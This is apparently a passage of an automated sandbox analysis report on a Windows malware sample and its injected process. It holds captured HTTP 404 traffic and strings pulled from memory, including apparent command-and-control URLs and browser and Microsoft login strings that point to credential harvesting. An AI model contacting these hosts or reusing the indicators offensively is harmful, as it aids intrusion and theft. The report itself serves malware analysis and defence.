25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:17 GMT  Server: Apache
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:19 GMT  Server: Apache
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:22 GMT  Server: Apache
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:24 GMT  Server: Apache  (this one sends Content-Type: text/html; charset=utf-8 instead of text/html)
                The four responses are otherwise identical apart from the Date header. Remaining headers:
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 389
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                Body (389 bytes, decoded from the captured hex dump; line breaks as in the response):
                    <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
                    <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
                    <title>404 Not Found</title>
                    </head><body>
                    <h1>Not Found</h1>
                    <p>The requested URL was not found on this server.</p>
                    <p>Additionally, a 404 Not Found
                    error was encountered while trying to use an ErrorDocument to handle the request.</p>

                    </body></html>
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:30 GMT  Server: Apache
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:33 GMT  Server: Apache
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:35 GMT  Server: Apache
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:19:38 GMT  Server: Apache
                The four responses are identical apart from the Date header. Remaining headers (a different Apache header set from the 14:19:17 to 14:19:24 group):
                    Server: Apache
                    X-Xss-Protection: 1; mode=block
                    Referrer-Policy: no-referrer-when-downgrade
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                Body (196 bytes, decoded from the captured hex dump; line breaks as in the response):
                    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
                    <html><head>
                    <title>404 Not Found</title>
                    </head><body>
                    <h1>Not Found</h1>
                    <p>The requested URL was not found on this server.</p>
                    </body></html>
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:11 GMT  Server: nginx
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:14 GMT  Server: nginx
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:17 GMT  Server: nginx
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:19 GMT  Server: nginx
                The four responses are identical apart from the Date header. Remaining headers:
                    Server: nginx
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                Body (548 bytes, decoded from the captured hex dump; every line ends in CR LF):
                    <html>
                    <head><title>404 Not Found</title></head>
                    <body>
                    <center><h1>404 Not Found</h1></center>
                    <hr><center>nginx</center>
                    </body>
                    </html>
                    <!-- a padding to disable MSIE and Chrome friendly error page -->
                    (the padding comment line is repeated six times in total)
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:48 GMT  Server: nginx/1.14.1
                Headers:
                    Server: nginx/1.14.1
                    Date: Wed, 18 Sep 2024 14:20:48 GMT
                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-09-18T14:20:53.2672313Z
                Body: empty (Content-Length: 0).
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:54 GMT  Server: cloudflare
                Headers:
                    Date: Wed, 18 Sep 2024 14:20:54 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Product: Z-BlogPHP 1.7.3
                    X-XSS-Protection: 1; mode=block
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYi0fVvSiCoyH6lo5%2FmmUEXnl2Wn%2B2ThhMoUXgcvOf0xfOY%2F0rwo6Fl7XiDBgeTJ1mClj3WFcn8Iu%2BY6q6IE%2FwsRVXIkLfnbc8rMO7LaDOlA2KOVCB8Tb24DP%2Fikxsk4QhA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c51fab57d3b7ce8-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Body: chunked and gzip-compressed, so the report's ASCII rendering of it is not meaningful. The capture keeps only the start of the first chunk: its size line "a52" (0xa52 = 2642 bytes) followed by the gzip magic 1f 8b 08. Data Raw:
                    61 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 8e 1f 8b a8 58 3f 07 52 26 4a 44 05 0e 4d bb 24 75 76 76 8a 72 0a eb 10 e9 22 31 93 d2 b7 f1 8e b4 85 4c 4b a2 29 a4 21 a9 4b 09 87 5b 4e 24 4c 84 24 8b 76 a9 48 92 2d 4b 4a 10 9d 06 61 27 b2 88 86 44 0d eb a2 6c 59 02 30 91 1a 15 3c 22 2b 85 90 3f 09 af 46 9f d5 89 0d 64 06 db c4 56 b1 f5 05 f4 ed 1d 00 3c d0 a2 02 45 17 a8 e4 71 fe 6e 83 74 62 6a 50 c5 df 22 df 12 e9 7f a4 da fb 2e 03 f0 51 26 1a 16 5b c4 b6 92 7a 4b 36 b1 41 81 65 ca f5 c4 5b 5d 16 45 9a e4 13 4b 67 cf a7 91 d9 15 6c e1 62 3c b1 67 ad 1a 8b cf c2 0c f4 49 85 58 a4 c4 74 54 5d df c6 55 92 34 52 c6 eb d4 21 77 f0 2c d2 71 d6 ea 80 8a 22 1a
            Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found  Date: Wed, 18 Sep 2024 14:20:57 GMT  Server: cloudflare
                Headers:
                    Date: Wed, 18 Sep 2024 14:20:57 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Product: Z-BlogPHP 1.7.3
                    X-XSS-Protection: 1; mode=block
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4nQ9G1BVj%2FENK2m%2FRzcsPmQlAa%2F4wGZjK002PQG1nsH%2B8moXxoChhuMBSTWorppXAy55EdEpZoMtlEeEfBiX7EBP2%2B1g2eXQQzG0QpbK0USQsZrHem5JqRptTxLTNTQQ1U%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c51fac53eb9435d-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Body: chunked and gzip-compressed, so the report's ASCII rendering of it is not meaningful. The capture keeps only the start of the first chunk: its size line "a5e" (0xa5e = 2654 bytes) followed by the gzip magic 1f 8b 08. Data Raw:
                    61 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 8e 1f 8b a8 58 3f 07 52 26 4a 44 05 0e 4d bb 24 75 76 76 8a 72 0a eb 10 e9 22 31 93 d2 b7 f1 8e b4 85 4c 4b a2 29 a4 21 a9 4b 09 87 5b 4e 24 4c 84 24 8b 76 a9 48 92 2d 4b 4a 10 9d 06 61 27 b2 88 86 44 0d eb a2 6c 59 02 30 91 1a 15 3c 22 2b 85 90 3f 09 af 46 9f d5 89 0d 64 06 db c4 56 b1 f5 05 f4 ed 1d 00 3c d0 a2 02 45 17 a8 e4 71 fe 6e 83 74 62 6a 50 c5 df 22 df 12 e9 7f a4 da fb 2e 03 f0 51 26 1a 16 5b c4 b6 92 7a 4b 36 b1 41 81 65 ca f5 c4 5b 5d 16 45 9a e4 13 4b 67 cf a7 91 d9 15 6c e1 62 3c b1 67 ad 1a 8b cf c2 0c f4 49 85 58 a4 c4 74 54 5d df c6 55 92 34 52 c6 eb d4 21 77 f0 2c d2 71 d6 ea 80 8a 22 1a 29 e3
            Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Wed, 18 Sep 2024 14:20:59 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Product: Z-BlogPHP 1.7.3
            X-XSS-Protection: 1; mode=block
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etHMhN214ihAwot1ehHbqV6GKyOUw1THI9%2BG9nPgSIz%2BduB%2FseIQSZLZXJeWFZH3XJ8Q0V7fGyO7RziAKO2sz%2FdPpOnnrtKwh9cimGs9dQqrhOXmuRNGgR9vgp07mwwHgZE%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c51fad5597119b6-EWR
            Content-Encoding: gzip
            alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Wed, 18 Sep 2024 14:21:02 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Product: Z-BlogPHP 1.7.3
            X-XSS-Protection: 1; mode=block
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYfRG4D1AXx1pQ8hcwLeUJhtixVuTUsut%2FfCYHLsG2pMLeVmDiFfMG9lKLwMZxcgVUWmWQAgZ4VK0V4BMxXlS28h1A%2F8w0pas86j%2BZJeRMO7CRY5575JOoodnOcxi9tx2ho%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c51fae56a0543b6-EWR
            alt-svc: h3=":443"; ma=86400
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/195.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/196.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/197.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/198.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/199.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/200.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/201.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/202.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/203.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/lol/204.html
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/search.php?act=search
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_system/login.php
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_system/script/c_html_js_add.php
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_system/script/zblogphp.js
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000003F0C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.nobartv6.website/pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4482452521.0000000004CDD000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.study-in-nyc.online
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4482452521.0000000004CDD000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.study-in-nyc.online/f1gw/
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2521879053.00000000082A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
